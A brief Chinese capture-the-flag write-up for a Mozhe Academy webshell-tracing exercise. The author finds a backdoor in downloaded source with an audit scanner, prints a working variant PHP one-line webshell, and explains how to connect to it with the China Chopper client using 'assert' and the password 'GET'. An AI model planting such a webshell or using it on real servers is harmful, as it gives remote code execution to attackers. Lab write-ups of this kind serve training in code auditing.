1. 程式人生 > >墨者學院-WebShell程式碼分析溯源(第1題)

墨者學院-WebShell程式碼分析溯源(第1題)

1.此題屬於程式碼審計,先下載原始碼,利用掃描工具直接掃描吧

使用seay原始碼審計系統掃一掃(實在不想一個個去看。。。)

2.檢測出來可疑程式碼片段,開啟檔案檢查一下,這種其實是變種一句話木馬,菜刀連線的時候直接在後面加上?POST=assert,密碼為GET,直接連線即可。

<?php
error_reporting(0);
$_GET['POST']($_POST['GET']);
?>

3.上菜刀